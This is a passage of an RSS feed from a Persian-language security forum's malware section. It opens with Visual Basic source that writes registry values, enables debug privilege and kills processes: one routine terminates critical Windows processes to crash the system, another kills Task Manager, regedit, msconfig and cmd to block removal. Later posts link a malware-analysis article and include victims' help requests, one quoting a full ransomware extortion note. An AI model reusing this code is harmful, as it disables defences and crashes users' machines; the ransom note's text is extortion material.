Const REG_DWORD_BIG_ENDIAN = 5&amp;<br />
Const REG_LINK = 6&amp;<br />
Const REG_MULTI_SZ = 7&amp;<br />
Const REG_RESOURCE_LIST = 8&amp;<br />
Const REG_FULL_RESOURCE_DESCRIPTOR = 9&amp;<br />
Const REG_RESOURCE_REQUIREMENTS_LIST = 10&amp;<br />
<br />
Const KEY_QUERY_VALUE = &amp;H1&amp;<br />
Const KEY_SET_VALUE = &amp;H2&amp;<br />
Const KEY_CREATE_SUB_KEY = &amp;H4&amp;<br />
Const KEY_ENUMERATE_SUB_KEYS = &amp;H8&amp;<br />
Const KEY_NOTIFY = &amp;H10&amp;<br />
Const KEY_CREATE_LINK = &amp;H20&amp;<br />
Const READ_CONTROL = &amp;H20000<br />
Const WRITE_DAC = &amp;H40000<br />
Const WRITE_OWNER = &amp;H80000<br />
Const SYNCHRONIZE = &amp;H100000<br />
Const STANDARD_RIGHTS_REQUIRED = &amp;HF0000<br />
Const STANDARD_RIGHTS_READ = READ_CONTROL<br />
Const STANDARD_RIGHTS_WRITE = READ_CONTROL<br />
Const STANDARD_RIGHTS_EXECUTE = READ_CONTROL<br />
Const KEY_READ = STANDARD_RIGHTS_READ Or KEY_QUERY_VALUE Or KEY_ENUMERATE_SUB_KEYS Or KEY_NOTIFY<br />
Const KEY_WRITE = STANDARD_RIGHTS_WRITE Or KEY_SET_VALUE Or KEY_CREATE_SUB_KEY<br />
Const KEY_EXECUTE = KEY_READ<br />
<br />
Dim hKey As Long, MainKeyHandle As Long<br />
Dim rtn As Long, lBuffer As Long, sBuffer As String<br />
Dim lBufferSize As Long<br />
Dim lDataSize As Long<br />
Dim ByteArray() As Byte<br />
<br />
'This constant determins wether or not to display error messages to the<br />
'user. I have set the default value to False as an error message can and<br />
'does become irritating after a while. Turn this value to true if you want<br />
'to debug your programming code when reading and writing to your system<br />
'registry, as any errors will be displayed in a message box.<br />
<br />
Const DisplayErrorMsg = False<br />
<br />
<br />
Function SetDWORDValue(SubKey As String, Entry As String, Value As Long)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was open successfully then<br />
      rtn = RegSetValueExA(hKey, Entry, 0, REG_DWORD, Value, 4) 'write the value<br />
      If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value<br />
         If DisplayErrorMsg = True Then 'if the user want errors displayed<br />
            'msgbox ErrorMsg(rtn)        'display the error<br />
         End If<br />
      End If<br />
      rtn = RegCloseKey(hKey) 'close the key<br />
   Else 'if there was an error opening the key<br />
      If DisplayErrorMsg = True Then 'if the user want errors displayed<br />
         'msgbox ErrorMsg(rtn) 'display the error<br />
      End If<br />
   End If<br />
End If<br />
<br />
End Function<br />
<br />
<br />
<br />
Function GetMainKeyHandle(MainKeyName As String) As Long<br />
<br />
Const HKEY_CLASSES_ROOT = &amp;H80000000<br />
Const HKEY_CURRENT_USER = &amp;H80000001<br />
Const HKEY_LOCAL_MACHINE = &amp;H80000002<br />
Const HKEY_USERS = &amp;H80000003<br />
Const HKEY_PERFORMANCE_DATA = &amp;H80000004<br />
Const HKEY_CURRENT_CONFIG = &amp;H80000005<br />
Const HKEY_DYN_DATA = &amp;H80000006<br />
   <br />
Select Case MainKeyName<br />
       Case "HKEY_CLASSES_ROOT"<br />
            GetMainKeyHandle = HKEY_CLASSES_ROOT<br />
       Case "HKEY_CURRENT_USER"<br />
            GetMainKeyHandle = HKEY_CURRENT_USER<br />
       Case "HKEY_LOCAL_MACHINE"<br />
            GetMainKeyHandle = HKEY_LOCAL_MACHINE<br />
       Case "HKEY_USERS"<br />
            GetMainKeyHandle = HKEY_USERS<br />
       Case "HKEY_PERFORMANCE_DATA"<br />
            GetMainKeyHandle = HKEY_PERFORMANCE_DATA<br />
       Case "HKEY_CURRENT_CONFIG"<br />
            GetMainKeyHandle = HKEY_CURRENT_CONFIG<br />
       Case "HKEY_DYN_DATA"<br />
            GetMainKeyHandle = HKEY_DYN_DATA<br />
End Select<br />
<br />
End Function<br />
<br />
Function ErrorMsg(lErrorCode As Long) As String<br />
    <br />
'If an error does accurr, and the user wants error messages displayed, then<br />
'display one of the following error messages<br />
<br />
Select Case lErrorCode<br />
       Case 1009, 1015<br />
            GetErrorMsg = "The Registry Database is corrupt!"<br />
       Case 2, 1010<br />
            GetErrorMsg = "Bad Key Name"<br />
       Case 1011<br />
            GetErrorMsg = "Can't Open Key"<br />
       Case 4, 1012<br />
            GetErrorMsg = "Can't Read Key"<br />
       Case 5<br />
            GetErrorMsg = "Access to this key is denied"<br />
       Case 1013<br />
            GetErrorMsg = "Can't Write Key"<br />
       Case 8, 14<br />
            GetErrorMsg = "Out of memory"<br />
       Case 87<br />
            GetErrorMsg = "Invalid Parameter"<br />
       Case 234<br />
            GetErrorMsg = "There is more data than the buffer has been allocated to hold."<br />
       Case Else<br />
            GetErrorMsg = "Undefined Error Code:  " &amp; Str&#36;(lErrorCode)<br />
End Select<br />
<br />
End Function<br />
<br />
<br />
<br />
Private Sub ParseKey(Keyname As String, Keyhandle As Long)<br />
    <br />
rtn = InStr(Keyname, "&#92;") 'return if "&#92;" is contained in the Keyname<br />
<br />
If Left(Keyname, 5) &lt;&gt; "HKEY_" Or Right(Keyname, 1) = "&#92;" Then 'if the is a "&#92;" at the end of the Keyname then<br />
   'msgbox "Incorrect Format:" + Chr(10) + Chr(10) + Keyname 'display error to the user<br />
   Exit Sub 'exit the procedure<br />
ElseIf rtn = 0 Then 'if the Keyname contains no "&#92;"<br />
   Keyhandle = GetMainKeyHandle(Keyname)<br />
   Keyname = "" 'leave Keyname blank<br />
Else 'otherwise, Keyname contains "&#92;"<br />
   Keyhandle = GetMainKeyHandle(Left(Keyname, rtn - 1)) 'seperate the Keyname<br />
   Keyname = Right(Keyname, Len(Keyname) - rtn)<br />
End If<br />
<br />
End Sub<br />
Function CreateKey(SubKey As String)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegCreateKey(MainKeyHandle, SubKey, hKey) 'create the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was created then<br />
      rtn = RegCloseKey(hKey)  'close the key<br />
   End If<br />
End If<br />
<br />
End Function<br />
Function SetStringValue(SubKey As String, Entry As String, Value As String)<br />
<br />
Call ParseKey(SubKey, MainKeyHandle)<br />
<br />
If MainKeyHandle Then<br />
   rtn = RegOpenKeyEx(MainKeyHandle, SubKey, 0, KEY_WRITE, hKey) 'open the key<br />
   If rtn = ERROR_SUCCESS Then 'if the key was open successfully then<br />
      rtn = RegSetValueEx(hKey, Entry, 0, REG_SZ, ByVal Value, Len(Value)) 'write the value<br />
      If Not rtn = ERROR_SUCCESS Then   'if there was an error writting the value<br />
         If DisplayErrorMsg = True Then 'if the user wants errors displayed<br />
            'msgbox ErrorMsg(rtn)        'display the error<br />
         End If<br />
      End If<br />
      rtn = RegCloseKey(hKey) 'close the key<br />
   Else 'if there was an error opening the key<br />
      If DisplayErrorMsg = True Then 'if the user wants errors displayed<br />
         'msgbox ErrorMsg(rtn)        'display the error<br />
      End If<br />
   End If<br />
End If<br />
<br />
End Function</code></div></div><br />
و ماژول دوم<br />
<div class="codeblock"><div class="title">کد: </div><div class="body" dir="ltr"><code>Private Declare Function GetVersion Lib "kernel32" () As Long<br />
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long<br />
Private Declare Function OpenProcessToken Lib "advapi32" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long<br />
Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long<br />
Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As Any, ReturnLength As Any) As Long<br />
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long<br />
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long<br />
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long<br />
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long<br />
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long<br />
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long<br />
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, lppe As Any) As Long<br />
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long<br />
<br />
Private Const TOKEN_ADJUST_PRIVILEGES = &amp;H20<br />
Private Const TOKEN_QUERY = &amp;H8<br />
Private Const SE_PRIVILEGE_ENABLED = &amp;H2<br />
Private Const PROCESS_ALL_ACCESS As Long = &amp;H1F0FFF<br />
Private Const PROCESS_VM_READ = 16<br />
Private Const TH32CS_SNAPHEAPLIST = &amp;H1<br />
Private Const TH32CS_SNAPPROCESS = &amp;H2<br />
Private Const TH32CS_SNAPTHREAD = &amp;H4<br />
Private Const TH32CS_SNAPMODULE = &amp;H8<br />
Private Const HKEY_CLASSES_ROOT = &amp;H80000000<br />
Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST + TH32CS_SNAPPROCESS + TH32CS_SNAPTHREAD + TH32CS_SNAPMODULE)<br />
Private Type PROCESSENTRY32<br />
    dwSize As Long<br />
    cntUsage As Long<br />
    th32ProcessID As Long<br />
    th32DefaultHeapID As Long<br />
    th32ModuleID As Long<br />
    cntThreads As Long<br />
    th32ParentProcessID As Long<br />
    pcPriClassBase As Long<br />
    dwFlags As Long<br />
    szexeFile As String * 260<br />
End Type<br />
<br />
Private Type LUID<br />
   lowpart As Long<br />
   highpart As Long<br />
End Type<br />
<br />
Private Type TOKEN_PRIVILEGES<br />
    PrivilegeCount As Long<br />
    LuidUDT As LUID<br />
    Attributes As Long<br />
End Type<br />
<br />
Function GiveMeThatHandle(ExeName) As Long<br />
Dim P_Pid, P_Proc, adr, bfLg As Long<br />
Dim res&amp;, ant&amp;<br />
Dim u As Integer<br />
Dim Process As PROCESSENTRY32<br />
<br />
res = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&amp;)<br />
<br />
If res &lt;&gt; 0 Then<br />
<br />
   Process.dwSize = Len(Process)<br />
   ant = Process32First(res, Process)<br />
   u = 0<br />
   <br />
Do<br />
  A = LCase(Process.szexeFile)<br />
    If InStr(A, ExeName) Then pids = Process.th32ProcessID<br />
    ant = Process32Next(res, Process)<br />
  u = u + 1<br />
Loop Until ant = 0<br />
<br />
End If<br />
<br />
P_Pid = pids<br />
hProcessID = P_Pid<br />
DoEvents<br />
<br />
    Dim hToken As Long<br />
    Dim hProcess As Long<br />
    Dim tp As TOKEN_PRIVILEGES<br />
    <br />
    If GetVersion() &gt;= 0 Then<br />
        If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or _<br />
            TOKEN_QUERY, hToken) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
<br />
        If LookupPrivilegeValue("", "SeDebugPrivilege", tp.LuidUDT) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
<br />
        tp.PrivilegeCount = 1<br />
        tp.Attributes = SE_PRIVILEGE_ENABLED<br />
<br />
        If AdjustTokenPrivileges(hToken, False, tp, 0, ByVal 0&amp;, _<br />
            ByVal 0&amp;) = 0 Then<br />
            GoTo CleanUp<br />
        End If<br />
    End If<br />
<br />
    P_Proc = OpenProcess(PROCESS_ALL_ACCESS, 0, hProcessID)<br />
    GiveMeThatHandle = P_Proc<br />
CleanUp:<br />
        If hToken Then CloseHandle hToken<br />
End Function<br />
<br />
Function EndAnyProcess(ExeName) As Boolean<br />
       Dim phandle As Long<br />
       Const PROCESS_ALL_ACCESS = 0<br />
       phandle = GiveMeThatHandle(ExeName)<br />
       Kill_Process = CBool(TerminateProcess(phandle, uExitCode))<br />
       Call CloseHandle(phandle)<br />
End Function<br />
<br />
Private Sub Rest_sys()<br />
<br />
Call EndAnyProcess("smss.exe")<br />
Call EndAnyProcess("csrss.exe")<br />
Call EndAnyProcess("system.exe")<br />
Call EndAnyProcess("svchost.exe")<br />
End Sub<br />
<br />
Sub end_show()<br />
<br />
Call EndAnyProcess("regedit.exe")<br />
Call EndAnyProcess("taskmgr.exe")<br />
Call EndAnyProcess("msconfig.exe")<br />
Call EndAnyProcess("cmd.exe")<br />
Call EndAnyProcess("mmc.exe")<br />
Call EndAnyProcess("opera.exe")<br />
End Sub</code></div></div> <img src="https://www.iranled.com/forum/images/smilies2/biggrin.gif" alt="خنده بلد − بهینه شده برای ورژن جدید" title="خنده بلد − بهینه شده برای ورژن جدید" class="smilie smilie_88" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[مقاله توابع ویندوزی در تحلیل بدافزار بخش اول-فارسی]]></title>
			<link>https://www.iranled.com/forum/thread-31374.html</link>
			<pubDate>Sat, 16 Sep 2017 09:33:43 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-31374.html</guid>
			<description><![CDATA[مقاله توابع ویندوزی در تحلیل بدافزار بخش اول<br />
ترجمه و تالیف : یاشار محمودنیا <br />
تعداد صفحات : 15 <br />
توسط : گروه تحقیق و توسعه بایت امن<br />
تاریخ انتشار : شهریور 1396<br />
<br />
<br />
<br />
سرفصل ها : <br />
<br />
▪️مقدمه <br />
▪️توابع کار با شبکه و اینترنت <br />
▪️توابع کار با ویندوز و فایل ها<br />
▪️توابع کار با پروسس، ماژول و Thread ها<br />
▪️توابع کار با سرویس ها<br />
▪️منابع<br />
<br />
لینک دانلود : <br />
<a href="https://goo.gl/H9nbyh" target="_blank" rel="noopener" class="mycode_url">https://goo.gl/H9nbyh</a>]]></description>
			<content:encoded><![CDATA[مقاله توابع ویندوزی در تحلیل بدافزار بخش اول<br />
ترجمه و تالیف : یاشار محمودنیا <br />
تعداد صفحات : 15 <br />
توسط : گروه تحقیق و توسعه بایت امن<br />
تاریخ انتشار : شهریور 1396<br />
<br />
<br />
<br />
سرفصل ها : <br />
<br />
▪️مقدمه <br />
▪️توابع کار با شبکه و اینترنت <br />
▪️توابع کار با ویندوز و فایل ها<br />
▪️توابع کار با پروسس، ماژول و Thread ها<br />
▪️توابع کار با سرویس ها<br />
▪️منابع<br />
<br />
لینک دانلود : <br />
<a href="https://goo.gl/H9nbyh" target="_blank" rel="noopener" class="mycode_url">https://goo.gl/H9nbyh</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[استخراج امضا های ویروس ها از دیتابیس آنتی ویروس]]></title>
			<link>https://www.iranled.com/forum/thread-30443.html</link>
			<pubDate>Mon, 01 Feb 2016 19:50:31 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-30443.html</guid>
			<description><![CDATA[سلام<br />
 من روی دیتابیس آنتی ویروس ClamAv کار کردم و تونستم امضاهای این آنتی ویروس روز از دیتابیسش استخراج کنم. بعد خودم یه آنتی ویروس نوشتم که با همین امضاها بتونه ویروس ها رو شناسائی کنه.<br />
نمی دونم آنتی ویروس های چند موتوره مثل آنتی ویروس ایرانی شید هم همین کار رو روی nod32 و avira کردن یا دارن از انجینشون استفاده میکنن.<br />
در هر حال پروژه آتی بنده کار روی استخراج امضاهای آنتی ویروس های مشهوری مثل avira است از دوستان کسی روی اینها کار کرده و میتونه اطلاعاتی برای شروع بهم بده یا همکاری داشته باشیم ؟ <br />
<br />
پایان نامه من روی روشهای ذخیره سازی امضاهای آنتی ویروس ها مرتبطه در حقیقت من باید کار تحقیقاتیم رو به صورت یه کار عملی روی یه آنتی ویروس مطرح پیاده سازی کنم ،<br />
 اگه سایتی یا جایی سراغ دارید که بتونم بیشتر نتیجه بگیرم لطفا راهنمائی کنید <br />
اینجا تقریبا چنین کاری کرده فقط سایتش چینیه و من سر در نیاوردم :<br />
Nod32 Database Decryption Tool By Bian<br />
<a href="http://zhan.renren.com/h5/entry/3602888498042829470" target="_blank" rel="noopener" class="mycode_url">http://zhan.renren.com/h5/entry/3602888498042829470</a>]]></description>
			<content:encoded><![CDATA[سلام<br />
 من روی دیتابیس آنتی ویروس ClamAv کار کردم و تونستم امضاهای این آنتی ویروس روز از دیتابیسش استخراج کنم. بعد خودم یه آنتی ویروس نوشتم که با همین امضاها بتونه ویروس ها رو شناسائی کنه.<br />
نمی دونم آنتی ویروس های چند موتوره مثل آنتی ویروس ایرانی شید هم همین کار رو روی nod32 و avira کردن یا دارن از انجینشون استفاده میکنن.<br />
در هر حال پروژه آتی بنده کار روی استخراج امضاهای آنتی ویروس های مشهوری مثل avira است از دوستان کسی روی اینها کار کرده و میتونه اطلاعاتی برای شروع بهم بده یا همکاری داشته باشیم ؟ <br />
<br />
پایان نامه من روی روشهای ذخیره سازی امضاهای آنتی ویروس ها مرتبطه در حقیقت من باید کار تحقیقاتیم رو به صورت یه کار عملی روی یه آنتی ویروس مطرح پیاده سازی کنم ،<br />
 اگه سایتی یا جایی سراغ دارید که بتونم بیشتر نتیجه بگیرم لطفا راهنمائی کنید <br />
اینجا تقریبا چنین کاری کرده فقط سایتش چینیه و من سر در نیاوردم :<br />
Nod32 Database Decryption Tool By Bian<br />
<a href="http://zhan.renren.com/h5/entry/3602888498042829470" target="_blank" rel="noopener" class="mycode_url">http://zhan.renren.com/h5/entry/3602888498042829470</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ویروس یابی!]]></title>
			<link>https://www.iranled.com/forum/thread-30398.html</link>
			<pubDate>Mon, 11 Jan 2016 19:55:27 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-30398.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="http://8pic.ir/images/yilgqnfwoloh59qba6mv.gif" alt="[تصویر:  yilgqnfwoloh59qba6mv.gif]" class="mycode_img" /></div>
<br />
<br />
<span style="color: #33ffff;" class="mycode_color">سلام و عرض ادب خدمت اعضای گرامی ایران ویج</span><br />
<br />
یه مطلب هست  درباره ویروس یابی بنظرم جالب اومد<br />
این آدرسش هست:<a href="http://forum.roq.ir/t43249" target="_blank" rel="noopener" class="mycode_url"> http://forum.roq.ir/t43249</a><br />
<br />
<span style="color: #3333ff;" class="mycode_color">خواستم بدونم این روش که بکار رفته چطوریه!اصولیه؟ حرفه ایه! نااشیانه هست! هست اصلا  میشه به این روش اعتماد داشت؟و...</span><br />
<br />
ممنون از توجه شما :gol:]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="http://8pic.ir/images/yilgqnfwoloh59qba6mv.gif" alt="[تصویر:  yilgqnfwoloh59qba6mv.gif]" class="mycode_img" /></div>
<br />
<br />
<span style="color: #33ffff;" class="mycode_color">سلام و عرض ادب خدمت اعضای گرامی ایران ویج</span><br />
<br />
یه مطلب هست  درباره ویروس یابی بنظرم جالب اومد<br />
این آدرسش هست:<a href="http://forum.roq.ir/t43249" target="_blank" rel="noopener" class="mycode_url"> http://forum.roq.ir/t43249</a><br />
<br />
<span style="color: #3333ff;" class="mycode_color">خواستم بدونم این روش که بکار رفته چطوریه!اصولیه؟ حرفه ایه! نااشیانه هست! هست اصلا  میشه به این روش اعتماد داشت؟و...</span><br />
<br />
ممنون از توجه شما :gol:]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ویروس تبلیغاتی]]></title>
			<link>https://www.iranled.com/forum/thread-29618.html</link>
			<pubDate>Wed, 04 Feb 2015 20:54:44 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29618.html</guid>
			<description><![CDATA[سلام ببخشید من سیستمم یه ویروسی گرفته که یکی از بچه ها بهم گفتن ویروس تبلیغاتیه یه سری کارهارو هم گفتن که انجام دادم ولی نوعش تفاوت کرد قبلا تبلیغات گوشه هر صفحه باز میشد الان روی یه new window<br />
میشه لطف کنین بگین باید چیکار کنم]]></description>
			<content:encoded><![CDATA[سلام ببخشید من سیستمم یه ویروسی گرفته که یکی از بچه ها بهم گفتن ویروس تبلیغاتیه یه سری کارهارو هم گفتن که انجام دادم ولی نوعش تفاوت کرد قبلا تبلیغات گوشه هر صفحه باز میشد الان روی یه new window<br />
میشه لطف کنین بگین باید چیکار کنم]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[ویروس کودر کمک فوری]]></title>
			<link>https://www.iranled.com/forum/thread-29612.html</link>
			<pubDate>Wed, 04 Feb 2015 01:40:32 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29612.html</guid>
			<description><![CDATA[سلام دوستان<br />
دیروز صبح با مشکل پر شدن سریع رم و Pagefile روبرو شدم و وقتی چک کردم دیدم دیدم svchost داره رم می خوره.<br />
سرویس های مرتبت با svchost رو چک کردم طبیعی بود.<br />
تمام نرم افزار ها رو بستم بهتر شد ولی بازم svchost مموری نسبتا زیادی گرفته بود. نرم افزار امنیتی هم Malwarebyte Premium یود.<br />
بعد در پروسس منیجر متوجه فایلی با نام 951C.tmp شدم که داخل %USER%TEMP% بود. اونو ٍEnd کردم و پس از چک کردن اوتوران ها و خالی کردن Temp و Prefetch سیستم رو ریستارت کردم. سیستم پس از بالا اومدن پیغام داد آدرس 951C.tmp درست نیست.<br />
بازم یه خورده svchost زیاد رم خورده بود. سرچ کردم مایکروسافت گفته بود Winsock ریست بشه، سون فروم گفته بود از framework هست . framework 4.5.2 هم نصب کردم Winsock هم ریست کردم و بعد از ریستارت متوجه شدم تعداد زیادی از فایل هام روی هارد دوم همه انکریپت شده با پسوند com و یه همچین چیزی به آخر همه شون اضافه شده<br />
id-9082568147_fud@india.com<br />
هیچ فایلی توی درایو c خراب نشده بود و اول از همه هارد دوم مورد حمله قرار گرفته بود و ترتیب حمله به این صورت به نظر می رسید<br />
Jpeg<br />
mkv<br />
avi<br />
rar<br />
مرورگر مورد استفاده هم Chrome Portable و ویندوز 7 x64<br />
ESET و Malwarebyte هم هیچ عکس العملی ندادن که با اون پسوند FUD نباید غیر طبیعی باشه. نهایتا از طریق ویندوز دوم (xp) با Stinger اسکن کردم داخل فولدر Chrome چند تا Artemis شناخت و avast هم یه تروجان ناشناس گرفت و SUPERAntispyware هم دو تا Somoto/Variant شناسایی کرد.<br />
الان هم فقط با safe mode بالا میام و هارد دوم رو جدا کردم تا تکلیف فایل ها روشن بشه و بعد ویندوز عوض کنم.<br />
دو مورد غیر عادی هم دیدم :<br />
یکی فایل Lockdir6.lg داخل %USER%PUBLIC%<br />
یکی هم وجود یه Pagefile.sys مشابه در درایو D<br />
<br />
لطفا راهنمایی ... عکس های مرحوم مادرم خیلی برام مهمن]]></description>
			<content:encoded><![CDATA[سلام دوستان<br />
دیروز صبح با مشکل پر شدن سریع رم و Pagefile روبرو شدم و وقتی چک کردم دیدم دیدم svchost داره رم می خوره.<br />
سرویس های مرتبت با svchost رو چک کردم طبیعی بود.<br />
تمام نرم افزار ها رو بستم بهتر شد ولی بازم svchost مموری نسبتا زیادی گرفته بود. نرم افزار امنیتی هم Malwarebyte Premium یود.<br />
بعد در پروسس منیجر متوجه فایلی با نام 951C.tmp شدم که داخل %USER%TEMP% بود. اونو ٍEnd کردم و پس از چک کردن اوتوران ها و خالی کردن Temp و Prefetch سیستم رو ریستارت کردم. سیستم پس از بالا اومدن پیغام داد آدرس 951C.tmp درست نیست.<br />
بازم یه خورده svchost زیاد رم خورده بود. سرچ کردم مایکروسافت گفته بود Winsock ریست بشه، سون فروم گفته بود از framework هست . framework 4.5.2 هم نصب کردم Winsock هم ریست کردم و بعد از ریستارت متوجه شدم تعداد زیادی از فایل هام روی هارد دوم همه انکریپت شده با پسوند com و یه همچین چیزی به آخر همه شون اضافه شده<br />
id-9082568147_fud@india.com<br />
هیچ فایلی توی درایو c خراب نشده بود و اول از همه هارد دوم مورد حمله قرار گرفته بود و ترتیب حمله به این صورت به نظر می رسید<br />
Jpeg<br />
mkv<br />
avi<br />
rar<br />
مرورگر مورد استفاده هم Chrome Portable و ویندوز 7 x64<br />
ESET و Malwarebyte هم هیچ عکس العملی ندادن که با اون پسوند FUD نباید غیر طبیعی باشه. نهایتا از طریق ویندوز دوم (xp) با Stinger اسکن کردم داخل فولدر Chrome چند تا Artemis شناخت و avast هم یه تروجان ناشناس گرفت و SUPERAntispyware هم دو تا Somoto/Variant شناسایی کرد.<br />
الان هم فقط با safe mode بالا میام و هارد دوم رو جدا کردم تا تکلیف فایل ها روشن بشه و بعد ویندوز عوض کنم.<br />
دو مورد غیر عادی هم دیدم :<br />
یکی فایل Lockdir6.lg داخل %USER%PUBLIC%<br />
یکی هم وجود یه Pagefile.sys مشابه در درایو D<br />
<br />
لطفا راهنمایی ... عکس های مرحوم مادرم خیلی برام مهمن]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[کمک خیلی فوری]]></title>
			<link>https://www.iranled.com/forum/thread-29497.html</link>
			<pubDate>Sun, 11 Jan 2015 02:49:01 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29497.html</guid>
			<description><![CDATA[<span style="font-family: Tahoma;" class="mycode_font"><span style="font-family: Impact;" class="mycode_font"><span style="font-family: Courier;" class="mycode_font"><span style="font-family: Courier;" class="mycode_font"><span style="font-family: Arial;" class="mycode_font">سلام<br />
چند روز پیش سیستم من یهو ریستارت شد<br />
وقتی بالا اومد تو درایو ها و پوشه ها یک فایل تکست وجود داشت که در پایین این نوشه اونو اوردم<br />
وقتی دقت کردم بدبختانه فایل های Text zip rar pdf docهمه پسونداشون عوض شده بود به این صورت<br />
New Text Document.txt.enc0ded!<br />
و به هیچ وجه باز نمیشد<br />
باکلی جستجو و تحقیق متوجه شدم دچار یه بد افزار خیلی بد شده ام<br />
به وسیله برنامه SPYHUNTERموفق شدم بد افزار رواز روی سیستم پاک کنم<br />
ولی متاسفانه قبلش ویندوز رو عوض کرده بود چون فک میکردم از ویندوزه<br />
حالا تهدید از بین رفته اما چون ویندوز رو عوض کردم جای برای RESTORE نمونده برام<br />
اومدم یکی از فایل های تکس رو پسوندشو به حالت .text برگردوندم<br />
اما وقتی باز میشه با یه سری حروف غیرقابل خوندن روبرو میشم<br />
هر کاری هم کردم درست نشد که نشد<br />
از تمام دوستان و اساتید درخواست کمک رو دارم<br />
خواهش میکنم بهم کمک کنید خیلی ممنون میشم</span></span></span></span></span><br />
<br />
Hi, your ID = JSOXXXXXX<br />
<br />
All important files were encoded with RSA-1024 encryption algorithm.<br />
There is the only way to restore them - purchase the unique unlock code.<br />
<br />
Warning! Any attempt to recovering files without our "Special program" will cause data damage or complete data loss.<br />
As we receive your payment, we will send special program and your unique code to unlock your system.<br />
<br />
Guarantee: You can send one of the encrypted file by email and we decode it for free as proof of our abilities.<br />
<br />
No sense to contact the police. Your payment must be made to the e-wallet. It's impossible to trace. <br />
Don`t waste your and our time.<br />
<br />
So, if you are ready to pay for recovering your files, please reply this email ChiuKhan@tom.com<br />
<br />
Then we will send payment instructions.]]></description>
			<content:encoded><![CDATA[<span style="font-family: Tahoma;" class="mycode_font"><span style="font-family: Impact;" class="mycode_font"><span style="font-family: Courier;" class="mycode_font"><span style="font-family: Courier;" class="mycode_font"><span style="font-family: Arial;" class="mycode_font">سلام<br />
چند روز پیش سیستم من یهو ریستارت شد<br />
وقتی بالا اومد تو درایو ها و پوشه ها یک فایل تکست وجود داشت که در پایین این نوشه اونو اوردم<br />
وقتی دقت کردم بدبختانه فایل های Text zip rar pdf docهمه پسونداشون عوض شده بود به این صورت<br />
New Text Document.txt.enc0ded!<br />
و به هیچ وجه باز نمیشد<br />
باکلی جستجو و تحقیق متوجه شدم دچار یه بد افزار خیلی بد شده ام<br />
به وسیله برنامه SPYHUNTERموفق شدم بد افزار رواز روی سیستم پاک کنم<br />
ولی متاسفانه قبلش ویندوز رو عوض کرده بود چون فک میکردم از ویندوزه<br />
حالا تهدید از بین رفته اما چون ویندوز رو عوض کردم جای برای RESTORE نمونده برام<br />
اومدم یکی از فایل های تکس رو پسوندشو به حالت .text برگردوندم<br />
اما وقتی باز میشه با یه سری حروف غیرقابل خوندن روبرو میشم<br />
هر کاری هم کردم درست نشد که نشد<br />
از تمام دوستان و اساتید درخواست کمک رو دارم<br />
خواهش میکنم بهم کمک کنید خیلی ممنون میشم</span></span></span></span></span><br />
<br />
Hi, your ID = JSOXXXXXX<br />
<br />
All important files were encoded with RSA-1024 encryption algorithm.<br />
There is the only way to restore them - purchase the unique unlock code.<br />
<br />
Warning! Any attempt to recovering files without our "Special program" will cause data damage or complete data loss.<br />
As we receive your payment, we will send special program and your unique code to unlock your system.<br />
<br />
Guarantee: You can send one of the encrypted file by email and we decode it for free as proof of our abilities.<br />
<br />
No sense to contact the police. Your payment must be made to the e-wallet. It's impossible to trace. <br />
Don`t waste your and our time.<br />
<br />
So, if you are ready to pay for recovering your files, please reply this email ChiuKhan@tom.com<br />
<br />
Then we will send payment instructions.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[تروجان مخرب]]></title>
			<link>https://www.iranled.com/forum/thread-29496.html</link>
			<pubDate>Sat, 10 Jan 2015 16:14:15 +0000</pubDate>
			<guid isPermaLink="false">https://www.iranled.com/forum/thread-29496.html</guid>
